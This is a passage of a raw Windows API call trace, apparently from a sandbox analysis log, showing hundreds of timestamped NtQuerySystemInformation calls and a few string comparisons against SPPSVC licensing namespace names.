[0272.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0272.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.775] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0272.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0272.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.792] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.801] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0272.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0272.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0272.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc520, Length=0x28, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 